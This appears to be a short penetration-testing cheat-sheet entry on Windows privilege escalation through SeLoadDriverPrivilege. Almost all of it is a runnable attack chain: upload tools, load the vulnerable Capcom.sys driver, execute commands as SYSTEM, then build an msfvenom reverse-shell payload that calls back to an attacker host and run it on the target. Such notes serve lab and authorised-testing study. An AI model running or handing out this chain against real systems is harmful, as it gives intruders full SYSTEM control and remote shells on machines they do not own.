SeLoadDriver Privilege
The last github has all the instructions.
Upload the driver eoploaddriver_x64.exe, Capcom.sys file, ExploitCapcom.exe on target machine under writable directory.
First we need to turn on the privilege of SeLoadDriverPrivilege that is disabled.
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
Now using ExploitCapcom.exe load Capcom.sys to target machine.
.\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys
After successfully loading Capcom.sys we can now run any cmd as privilege user with EXPLOIT keyword.
.\ExploitCapcom.exe EXPLOIT whoami
Now we can generate a revshell with msfvenom. You can also use other revshell. On Attacker vm.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe
Upload it on Traget machine. Now execute the payload.
.\ExploitCapcom.exe EXPLOIT shell.exe
You gonna get reverse shell as SYSTEM.
Last updated